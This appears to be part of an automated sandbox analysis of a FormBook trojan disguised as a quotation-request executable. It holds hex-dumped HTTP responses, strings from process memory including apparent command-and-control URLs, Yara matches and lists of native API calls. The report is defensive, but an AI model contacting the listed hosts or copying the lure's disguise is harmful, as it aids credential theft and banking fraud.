6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:06:16 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:06:19 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:06:22 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66

Source: nosimiokOMOHm.exe, 00000005.00000002.113719291056.0000000004294000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://fonts.googleapis.com/css?family=Open
Source: write.exe, 00000004.00000002.112737835650.00000000065D4000.00000004.10000000.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113719291056.0000000004294000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://justinmezzell.com
Source: write.exe, 00000004.00000002.112737835650.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113719291056.00000000045B8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://myrideguy.net/kgyd/?ATk=Wu3HLPqvQhberYZQa3Sb
Source: write.exe, 00000004.00000002.112737835650.00000000065D4000.00000004.10000000.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113719291056.0000000004294000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.dzyngiri.com
Source: nosimiokOMOHm.exe, 00000005.00000002.113717742258.00000000012C9000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.numbox.live
Source: nosimiokOMOHm.exe, 00000005.00000002.113717742258.00000000012C9000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.numbox.live/q7ah/
Source: write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Um65m294.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: write.exe, 00000004.00000003.109269510237.000000000809F000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp, Um65m294.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Um65m294.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: write.exe, 00000004.00000002.112737835650.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113719291056.0000000003C4C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://http.gn301.com:12345/?u=
Source: write.exe, 00000004.00000002.112735509747.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109260520049.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109260325103.00000000030AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: write.exe, 00000004.00000002.112735509747.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109260520049.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109260325103.00000000030AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: write.exe, 00000004.00000002.112735509747.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109260520049.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109260325103.00000000030AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: write.exe, 00000004.00000002.112735509747.000000000308F000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109260419414.0000000003096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: write.exe, 00000004.00000002.112735509747.0000000003066000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
Source: write.exe, 00000004.00000003.109259322323.000000000801A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
Source: write.exe, 00000004.00000003.109269510237.000000000809F000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp, Um65m294.4.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: write.exe, 00000004.00000003.109269510237.000000000809F000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp, Um65m294.4.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: write.exe, 00000004.00000003.109269510237.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Um65m294.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.109069478758.0000000001120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.112736877355.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.112736541282.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.113717742258.0000000001260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.109071309836.0000000001A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.109069478758.0000000001120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.112736877355.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.112736541282.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.113717742258.0000000001260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.109071309836.0000000001A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, SafeNativeMethods.cs

Large array initialization: : array initializer size 672439

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0042C503 NtClose,	2_2_0042C503
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016434E0 NtCreateMutant,LdrInitializeThunk,	2_2_016434E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642B90 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01642B90
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642A80 NtClose,LdrInitializeThunk,	2_2_01642A80
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642D10 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01642D10
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01644260 NtSetContextThread,	2_2_01644260
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01644570 NtSuspendThread,	2_2_01644570
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016429F0 NtReadFile,	2_2_016429F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016429D0 NtWaitForSingleObject,	2_2_016429D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016438D0 NtGetContextThread,	2_2_016438D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642B20 NtQueryInformationProcess,	2_2_01642B20
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642B00 NtQueryValueKey,	2_2_01642B00
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642B10 NtAllocateVirtualMemory,	2_2_01642B10
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642BE0 NtQueryVirtualMemory,	2_2_01642BE0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642BC0 NtQueryInformationToken,	2_2_01642BC0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642B80 NtCreateKey,	2_2_01642B80
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642A10 NtWriteFile,	2_2_01642A10
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642AC0 NtEnumerateValueKey,	2_2_01642AC0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642AA0 NtQueryInformationFile,	2_2_01642AA0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642D50 NtWriteVirtualMemory,	2_2_01642D50
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642DC0 NtAdjustPrivilegesToken,	2_2_01642DC0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642DA0 NtReadVirtualMemory,	2_2_01642DA0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642C50 NtUnmapViewOfSection,	2_2_01642C50
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642C20 NtSetInformationFile,	2_2_01642C20
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642C30 NtMapViewOfSection,	2_2_01642C30
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01643C30 NtOpenProcessToken,	2_2_01643C30
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642C10 NtOpenProcess,	2_2_01642C10
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642CF0 NtDelayExecution,	2_2_01642CF0
